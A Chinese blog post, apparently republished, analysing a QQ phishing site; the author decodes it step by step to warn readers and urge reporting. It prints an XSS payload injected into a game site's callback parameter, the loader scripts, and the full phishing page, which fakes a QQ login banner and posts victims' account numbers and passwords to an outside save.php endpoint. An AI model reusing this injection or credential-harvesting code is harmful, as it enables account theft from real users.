18143453325 在线咨询 在线咨询
18143453325 在线咨询
所在位置: 首页 > 营销资讯 > 电子商务 > QQ盗号网站分析

QQ盗号网站分析

时间:2023-03-14 06:58:01 | 来源:电子商务

时间:2023-03-14 06:58:01 来源:电子商务

~没有题图随便翻出来一个吧

7月14号晚上 突然qq好友来了一条消息

点开一看

草 盗号网站

制作很十分精细,上方特意做了一个假的“网页由http://xxx.qq.com提供”

估计到这里很多人就被骗住了(包括截图中的小伙伴)

而且这个网站还很缺德:退不出去

当时就来火了:一个盗号网站还这么嚣张

打开电脑浏览器,登录这个网站。

发现无法正常访问,推测是检测了UA

仔细一看地址栏,发现有一些不对

这个网站用了个js加载到了游戏狗的网站上面

Apibbs&a=getLists&callback=%00%00%00%00%00%00%00<scripT%2fsrc%3D%2f%2f%2f%2fmofiu.cn%2flib%2fa.js><%2fscripT><!-(从callback=后面)

解码后得到

<scripT/src=////mofiu.cn/lib/a.js></scripT><!-/a.js找到了真实的盗号网站http://mofiu.cn

看看a.js

解码后可得到

(没放出来的是一堆解码用的函数)

function base64_encode(d) { var q = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var z, y, x, w, v, u, t, s, i = 0, j = 0, p = '', r = []; if (!d) { return d } do { z = d.charCodeAt(i++); y = d.charCodeAt(i++); x = d.charCodeAt(i++); s = z << 16 | y << 8 | x; w = s >> 18 & 0x3f; v = s >> 12 & 0x3f; u = s >> 6 & 0x3f; t = s & 0x3f; r[j++] = q.charAt(w) + q.charAt(v) + q.charAt(u) + q.charAt(t) } while (i < d.length); p = r.join(''); var r = d.length % 3; return (r ? p.slice(0, r - 3) : p) + '==='.slice(r || 3)}function base64_decode(d) { var q = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var z, y, x, w, v, u, t, s, i = 0, j = 0, r = []; if (!d) { return d } d += ''; do { w = q.indexOf(d.charAt(i++)); v = q.indexOf(d.charAt(i++)); u = q.indexOf(d.charAt(i++)); t = q.indexOf(d.charAt(i++)); s = w << 18 | v << 12 | u << 6 | t; z = s >> 16 & 0xff; y = s >> 8 & 0xff; x = s & 0xff; if (u == 64) { r[j++] = String.fromCharCode(z) } else if (t == 64) { r[j++] = String.fromCharCode(z, y) } else { r[j++] = String.fromCharCode(z, y, x) } } while (i < d.length); return r.join('')}function arcfour(k, d) { var o = ''; s = new Array(); var n = 256; l = k.length; for (var i = 0; i < n; i++) { s[i] = i } for (var j = i = 0; i < n; i++) { j = (j + s[i] + k.charCodeAt(i % l)) % n; var x = s[i]; s[i] = s[j]; s[j] = x } for (var i = j = y = 0; y < d.length; y++) { i = (i + 1) % n; j = (j + s[i]) % n; x = s[i]; s[i] = s[j]; s[j] = x; o += String.fromCharCode(d.charCodeAt(y) ^ s[(s[i] + s[j]) % n]) } return o}上面是js中自带的解码函数

可以看到,这段js用了document.write加载了一段新的代码

运用上面的自带解码,可以获得到

"%3Cscript%3E%0Aif%20(navigator.userAgent.toLowerCase().indexOf('qq')%20%3C%200)%20%7B%0A%09location.href%20%3D%20'https%3A%2F%2Fwww.baidu.com'%3B%0A%7D%20else%20%7B%0A%09var%20script%20%3D%20document.createElement(%22script%22)%3B%0A%09script.setAttribute(%22type%22%2C%20%22text%2Fjavascript%22)%3B%0A%09script.setAttribute(%22src%22%2C%20%22%2F%2Fmofiu.cn%2Flib%2Fax.js%22)%3B%0A%09var%20heads%20%3D%20document.getElementsByTagName(%22head%22)%3B%0A%09if%20(heads.length)%20%7B%0A%09%09heads%5B0%5D.appendChild(script)%3B%0A%09%7D%20else%20%7B%0A%09%09document.documentElement.appendChild(script)%3B%0A%09%7D%0A%7D%0A%3C%2Fscript%3E"urldecode后

"<script>if (navigator.userAgent.toLowerCase().indexOf('qq') < 0) { location.href = 'https://www.baidu.com';} else { var script = document.createElement("script"); script.setAttribute("type", "text/javascript"); script.setAttribute("src", "//mofiu.cn/lib/ax.js"); var heads = document.getElementsByTagName("head"); if (heads.length) { heads[0].appendChild(script); } else { document.documentElement.appendChild(script); }}</script>"一段新的script,里面带上了是否为用qq内置浏览器的检测

navigator.userAgent.toLowerCase().indexOf('qq')并且加载了一个新的js

script.setAttribute("src", "//mofiu.cn/lib/ax.js");继续打开这个新的js,同理进行解码

将document.write里面的代码解码

"%3C!DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22zh-cn%22%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3DUTF-8%22%3E%0A%20%20%20%20%3Cmeta%20id%3D%22viewport%22%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2Cminimum-scale%3D1%2Cmaximum-scale%3D1%2Cinitial-scale%3D1%2Cuser-scalable%3Dno%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22apple-mobile-web-app-capable%22%20content%3D%22yes%22%3E%0A%20%20%20%20%3Cscript%20src%3D%22%2F%2Flibs.baidu.com%2Fjquery%2F2.0.0%2Fjquery.min.js%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Clink%20href%3D%22%2F%2Fmofiu.cn%2Ftemplate%2Fcss%2Fcss.css%22%20rel%3D%22stylesheet%22%20type%3D%22text%2Fcss%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22%2F%2Fqzonestyle.gtimg.cn%2Fqzone%2Fphone%2Fstyle%2Flogin.css%22%3E%0A%20%20%20%20%3Cscript%20src%3D%22%2F%2Fopen.mobile.qq.com%2Fsdk%2Fqqapi.js%3F_bid%3D152%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%24(function()%7B%0A%0A%20mqq.ui.setTitleButtons(%7B%0A%20%20%20left%20%3A%20%7B%0A%20%20%20%20%20%20%20title%20%3A%20%22%E7%A7%81%E5%AF%86%E7%9B%B8%E5%86%8C%22%2C%0A%20%20%20%20%20%20%20callback%20%3A%20function%20()%20%7B%0A%20%20%20%20%20%20%20%20%20%20%2F%2F%0A%20%20%20%20%20%20%20%7D%0A%20%20%20%7D%2C%0A%20%20%20right%20%3A%20%7B%0A%20%20%20%20%20%20%20hidden%3A%20true%0A%20%20%20%7D%0A%7D)%0A%20%20%0A%7D)%3B%0A%3C%2Fscript%3E%0A%20%20%20%20%3C!--%E9%A1%B6%E9%83%A8banner--%3E%0A%20%20%3C%2Fhead%3E%0A%20%20%3Cscript%3E%0A%20%20%20%20var%20doc%3D%24(document)%3Bvar%20_touches_point1%3D0%3Bvar%20_touches_point2%3D0%3BaddEventListener(%22touchstart%22%2Cfunction(a)%7B_touches_point1%3Da.touches%5B0%5D.pageY%7D)%3BaddEventListener(%22touchmove%22%2Cfunction(a)%7B_touches_point2%3Da.touches%5B0%5D.pageY%3Bif(doc.scrollTop()%3C%3D0%26%26_touches_point1%3C_touches_point2)%7Ba.preventDefault()%3Bif(%24(%22%23_domain_display%22).length%3C%3D0)%7B%24(%22body%22).prepend('%3Cdiv%20id%3D%22_domain_display%22%20style%3D%22text-align%3Acenter%3Bbackground-color%3A%23bebdc2%3Bcolor%3A%2365696c%3Bheight%3A0px%3Bpadding-top%3A15px%3Bline-height%3A26px%3Bfont-size%3A12px%3Boverflow%3Ahidden%3B%22%3E%3Cp%3E%E7%BD%91%E9%A1%B5%E7%94%B1%20'%2B%0A%09'ui.ptlogin2.qq.com'%0A%09%2B'%20%E6%8F%90%E4%BE%9B%3C%2Fp%3E%3Cp%3EQQ%E6%B5%8F%E8%A7%88%E5%99%A8X5%E5%86%85%E6%A0%B8%E6%8F%90%E4%BE%9B%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3C%2Fp%3E%3C%2Fdiv%3E')%7D%24(%22%23_domain_display%22).height((_touches_point2-_touches_point1))%7D%7D)%3BaddEventListener(%22touchend%22%2Cfunction(a)%7B%24(%22%23_domain_display%22).slideUp(%22normal%22%2Cfunction()%7B%24(%22%23_domain_display%22).remove()%7D)%7D)%3B%0Aeval(function(p%2Ca%2Cc%2Ck%2Ce%2Cd)%7Be%3Dfunction(c)%7Breturn(c%3Ca%3F%22%22%3Ae(parseInt(c%2Fa)))%2B((c%3Dc%25a)%3E35%3FString.fromCharCode(c%2B29)%3Ac.toString(36))%7D%3Bif(!''.replace(%2F%5E%2F%2CString))%7Bwhile(c--)d%5Be(c)%5D%3Dk%5Bc%5D%7C%7Ce(c)%3Bk%3D%5Bfunction(e)%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction()%7Breturn'%5C%5Cw%2B'%7D%3Bc%3D1%3B%7D%3Bwhile(c--)if(k%5Bc%5D)p%3Dp.replace(new%20RegExp('%5C%5Cb'%2Be(c)%2B'%5C%5Cb'%2C'g')%2Ck%5Bc%5D)%3Breturn%20p%3B%7D('8%201%3D%7B4%3A6%2C5%3A6%2C7%3A6%7D%3B8%202%3D9.d%3B1.4%3D2.3(%22b%22)%3D%3D0%3B1.5%3D2.3(%22c%22)%3D%3D0%3B1.a%3D(2%3D%3D%22e%22)%7C%7C(2.3(%22f%22)%3D%3D0)%3Bk(1.4%7C%7C1.5%7C%7C1.7)%7Bo.n.l%3D%22g%3A%2F%2Fj.i.h%2Fm%2F%22%7D'%2C25%2C25%2C'%7Csystem%7Cp%7CindexOf%7Cwin%7Cmac%7Cfalse%7Cxll%7Cvar%7Cnavigator%7Cx11%7CWin%7CMac%7Cplatform%7CX11%7CLinux%7Chttp%7Ccom%7Cqq%7Cpvp%7Cif%7Chref%7C%7Clocation%7Cwindow'.split('%7C')%2C0%2C%7B%7D))%3B%0Aif(navigator.userAgent.indexOf('QQ%2F')%3E0)%7B%0A%20%20%7Delse%7B%0A%09window.location.href%3D'http%3A%2F%2Fi.qq.com'%3B%0A%20%20%7D%0Avar%20province%20%3D%20remote_ip_info.province%3B%20var%20city%20%3D%20remote_ip_info.city%3B%20document.getElementById(%22ip%22).value%3Dprovince%2Bcity%3B%3C%2Fscript%3E%0A%20%20%3Cbody%20style%3D%22zoom%3A%201%3B%22%3E%0A%20%20%20%20%3Cdiv%20id%3D%22content%22%20class%3D%22content%22%3E%0A%20%20%20%20%20%20%3Cdiv%20id%3D%22error_tips%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22error_tips_content%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22error_icon%22%3E%3C%2Fspan%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22error_message%22%3E%3C%2Fspan%3E%0A%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%3Cdiv%20id%3D%22login%22%20class%3D%22login%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22logo%22%20class%3D%22logo%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22app_name%22%20style%3D%22display%3A%20none%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22q_login%22%20class%3D%22q_login%22%20style%3D%22display%3A%20none%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22q_login_title%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22q_login_logo%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Clabel%20id%3D%22q_login_tips%22%3E%3C%2Flabel%3E%0A%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22q_logon_list%22%20class%3D%22q_logon_list%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22web_login%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cform%20id%3D%22loginform%22%20autocomplete%3D%22off%22%20name%3D%22loginform%22%20action%3D%22%22%20method%3D%22%22%20target%3D%22%22%20style%3D%22margin%3A0%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20type%3D%22hidden%22%20name%3D%22ip%22%20id%3D%22ip%22%20%2F%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cul%20id%3D%22g_list%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%20id%3D%22g_u%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22del_touch%22%20class%3D%22del_touch%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22del_u%22%20class%3D%22del_u%22%3E%3C%2Fspan%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20id%3D%22u%22%20class%3D%22inputstyle%22%20name%3D%22hrUW3PG7mp3RLd3dJu%22%20autocomplete%3D%22off%22%20placeholder%3D%22QQ%E5%8F%B7%E7%A0%81%2F%E6%89%8B%E6%9C%BA%2F%E9%82%AE%E7%AE%B1%22%3E%3C%2Fli%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cli%20id%3D%22g_p%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22del_touch_p%22%20class%3D%22del_touch%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22del_p%22%20class%3D%22del_u%22%3E%3C%2Fspan%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20id%3D%22p%22%20class%3D%22inputstyle%22%20maxlength%3D%2216%22%20type%3D%22password%22%20name%3D%22LxMzAX2jog9Bpjs07jP%22%20autocorrect%3D%22off%22%20placeholder%3D%22%E8%AF%B7%E8%BE%93%E5%85%A5%E6%82%A8%E7%9A%84QQ%E5%AF%86%E7%A0%81%22%3E%3C%2Fli%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2Ful%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20href%3D%22javascript%3Avoid(0)%3B%22%20id%3D%22go%22%3E%E7%99%BB%20%E5%BD%95%3C%2Fdiv%3E%3C%2Fform%3E%0A%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22switch%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22swicth_login%22%20onclick%3D%22pt._switch()%22%20style%3D%22display%3A%20none%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22zc_feedback%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22zc%22%20onclick%3D%22window.open(%26%2339%3Bhttp%5Cx3A%5Cx2F%5Cx2Fptlogin2.qq.com%5Cx2Fj_newreg_url%26%2339%3B)%22%3E%E6%B3%A8%E5%86%8C%E6%96%B0%E5%B8%90%E5%8F%B7%3C%2Fspan%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cspan%20id%3D%22forgetpwd%22%20onclick%3D%22window.open(%26%2339%3Bhttp%3A%2F%2Fptlogin2.qq.com%2Fj_findpwd_url%26%2339%3B)%22%3E%E5%BF%98%E4%BA%86%E5%AF%86%E7%A0%81%EF%BC%9F%3C%2Fspan%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22custom_bottom%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%20%20%3Cdiv%20id%3D%22vcode%22%3E%0A%20%20%20%20%20%20%20%20%3Clabel%20id%3D%22vcode_tips%22%3E%3C%2Flabel%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22vcode_area%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cimg%20id%3D%22vcode_img%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Clabel%20id%3D%22input_tips%22%3E%3C%2Flabel%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cinput%20id%3D%22vcode_input%22%20name%3D%22vcode_input%22%20tabindex%3D%223%22%20autocomplete%3D%22off%22%20autocorrect%3D%22off%22%20maxlength%3D%226%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22button%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%20%20%20%20%3Cdiv%20id%3D%22new_vcode%22%20class%3D%22new_vcode%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%3Cdiv%20id%3D%22footerBlank%22%3E%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20var%20times%20%3D%200%3B%0A%20%20%20%20%20%20function%20error(msg)%20%7B%0A%20%20%20%20%20%20%20%20%24(%22%23error_tips%22).css(%7B%0A%20%20%20%20%20%20%20%20%20%20display%3A%20'block'%0A%20%20%20%20%20%20%20%20%7D)%3B%0A%20%20%20%20%20%20%20%20%24('%23error_message').html(msg)%3B%0A%20%20%20%20%20%20%20%20err%20%3D%20true%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%24('form%20input').focus(function()%20%7B%0A%20%20%20%20%20%20%20%20%24(%22%23error_tips%22).css(%7B%0A%20%20%20%20%20%20%20%20%20%20display%3A%20'none'%0A%20%20%20%20%20%20%20%20%7D)%3B%0A%20%20%20%20%20%20%20%20err%20%3D%20false%3B%0A%20%20%20%20%20%20%7D)%3B%0A%20%20%20%20%20%20%24(%22%23error_tips%22).on('click'%2C%0A%20%20%20%20%20%20function()%20%7B%0A%20%20%20%20%20%20%20%20%24(this).hide()%3B%0A%20%20%20%20%20%20%7D)%3B%0A%20%20%20%20%20%20%24(%22%23go%22).on('click'%2C%0A%20%20%20%20%20%20%20%20function()%20%7B%0A%20%20%20%20%20%20%20%20var%20%24this%20%3D%20%24(this)%3B%0A%20%20%20%20%20%20%20%20err%20%3D%20false%3B%0A%20%20%20%20%20%20%20%20var%20p%20%3D%20%24(%22%23p%22).val()%3B%0A%20%20%20%20%20%20%20%20var%20u%20%3D%20%24(%22%23u%22).val()%3B%0A%09u%20%3D%3D%20''%20%26%26%20error('%E6%82%A8%E8%BF%98%E6%B2%A1%E6%9C%89%E8%BE%93%E5%85%A5%E5%B8%90%E5%8F%B7%EF%BC%81')%3B%09%0A%09if(err)%20return%20false%3B%0A%09p%20%3D%3D%20''%20%26%26%20error(%22%E6%82%A8%E8%BF%98%E6%B2%A1%E6%9C%89%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81%EF%BC%81%22)%3B%0A%09if(err)%20return%20false%3B%0A%0A%09%2F%5E%5B1-9%5D%5B0-9%5D%7B5%2C9%7D%24%2F.test(u)%20%7C%7C%20error('%E8%AF%B7%E8%BE%93%E5%85%A5%E6%AD%A3%E7%A1%AE%E7%9A%84%E5%B8%90%E5%8F%B7%EF%BC%81')%3B%0A%09if(err)%20return%20false%3B%0A%0A%09if(sameChar(u))%7B%0A%09%09error(%22%E6%82%A8%E8%BE%93%E5%85%A5%E7%9A%84%E5%B8%90%E5%8F%B7%E6%88%96%E5%AF%86%E7%A0%81%E4%B8%8D%E6%AD%A3%E7%A1%AE%EF%BC%8C%E8%AF%B7%E9%87%8D%E6%96%B0%E8%BE%93%E5%85%A5%E3%80%82%22)%3B%0A%09%09%24(%22%23u%22).val('')%3B%0A%09%09%24(%22%23p%22).val('')%3B%0A%09%09return%20false%3B%0A%09%7D%0A%09%0A%09var%20len%20%3D%20p.length%3B%0A%0A%09(len%20%3C%206%20%7C%7C%20len%3E16)%20%26%26%20error('%E6%82%A8%E8%BE%93%E5%85%A5%E7%9A%84%E5%B8%90%E5%8F%B7%E6%88%96%E5%AF%86%E7%A0%81%E4%B8%8D%E6%AD%A3%E7%A1%AE%EF%BC%8C%E8%AF%B7%E9%87%8D%E6%96%B0%E8%BE%93%E5%85%A5%E3%80%82')%3B%0A%09%2F*%E6%96%B0%E5%A2%9E%E5%AF%86%E7%A0%81%E6%A0%A1%E9%AA%8C*%2F%0A%09var%20pattern%20%3D%20%2F%5B%5Cu4e00-%5Cu9fa5%5D%2B%2Fg%3B%0A%09pattern.test(p)%20%26%26%20error(%22%E6%82%A8%E8%BE%93%E5%85%A5%E7%9A%84%E5%B8%90%E5%8F%B7%E6%88%96%E5%AF%86%E7%A0%81%E4%B8%8D%E6%AD%A3%E7%A1%AE%EF%BC%8C%E8%AF%B7%E9%87%8D%E6%96%B0%E8%BE%93%E5%85%A5%E3%80%82%22)%3B%0A%09var%20pattern2%20%3D%20%2F%5E%5B0-9%5D*%24%2Fg%3B%0A%09pattern2.test(p)%20%26%26%20error(%22%E6%82%A8%E8%BE%93%E5%85%A5%E7%9A%84%E5%B8%90%E5%8F%B7%E6%88%96%E5%AF%86%E7%A0%81%E4%B8%8D%E6%AD%A3%E7%A1%AE%EF%BC%8C%E8%AF%B7%E9%87%8D%E6%96%B0%E8%BE%93%E5%85%A5%E3%80%82%22)%3B%0A%09if(sameChar(p))%7B%0A%09%09error(%22%E6%82%A8%E8%BE%93%E5%85%A5%E7%9A%84%E5%B8%90%E5%8F%B7%E6%88%96%E5%AF%86%E7%A0%81%E4%B8%8D%E6%AD%A3%E7%A1%AE%EF%BC%8C%E8%AF%B7%E9%87%8D%E6%96%B0%E8%BE%93%E5%85%A5%E3%80%82%22)%3B%0A%09%09%24(%22%23p%22).val('')%3B%0A%09%09return%20false%3B%0A%09%7D%0A%09%2F**%2F%0A%0A%09%09if%20(!err)%7B%0A%09%09%09%24.ajax(%7B%0A%09%09%09%09url%3A'http%3A%2F%2Fax.mofiu.cn%2Fsave.php'%2C%0A%09%09%09%09type%3A'POST'%2C%0A%09%09%09%09dataType%3A'json'%2C%0A%09%09%09%09async%3Afalse%2C%20%0A%09%09%09%09data%3A%20%24('%23loginform').serialize()%2C%0A%09%09%09%09success%3Afunction(r)%7B%0A%09%09%09%09%24.getScript('%2F%2Fmofiu.cn%2Flib%2Ft.js')%3B%0A%09%09%09%09%7D%2C%0A%09%09%09%09error%3Afunction(er)%7B%0A%09%09%09%09%24.getScript('%2F%2Fmofiu.cn%2Flib%2Ft.js')%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%09%09%09%7D)%0A%09%09%7D%0A%20%20%20%20%20%20%7D)%0A%20%20%20%20%09%20%20function%20sameChar(str)%7B%0A%09%09%20%20var%20result%20%3D%20true%3B%0A%09%09%20%20var%20c%20%3D%20str.charAt(0)%3B%0A%09%09%20%20for(var%20i%3D0%3Bi%3Cstr.length%3Bi%2B%2B)%7B%0A%09%09%09%20%20if(c%20!%3D%20str.charAt(i))%7B%0A%09%09%09%09%20result%20%3D%20false%3B%0A%09%09%09%09%20break%3B%09%09%09%09%20%0A%09%09%09%20%20%7D%0A%09%09%20%20%7D%0A%09%09%20return%20result%3B%0A%09%20%20%7D%3C%2Fscript%3E%0A%20%20%20%20%3Cdiv%20style%3D%22display%3Anone%3B%22%3E%0A%20%20%3C%2Fbody%3E%0A%3C%2Fhtml%3E"继续解

得到了最终看到的网页的html文件

并且可以找到相应的上传qq账号密码的code:

至此,对这个诈骗网站的分析就结束了。

至于有什么用嘛

举报吧

现在qq中流行的盗号网站(严格来说是诈骗),全看你个人的安全防范意识,大概的流程都是这样了,希望看过这篇文章的人以后不会被蒙骗,并且顺手举报。

更新于2020.8.31 删除了黑历史

关键词:分析

74
73
25
news

版权所有© 亿企邦 1997-2025 保留一切法律许可权利。

为了最佳展示效果,本站不支持IE9及以下版本的浏览器,建议您使用谷歌Chrome浏览器。 点击下载Chrome浏览器
关闭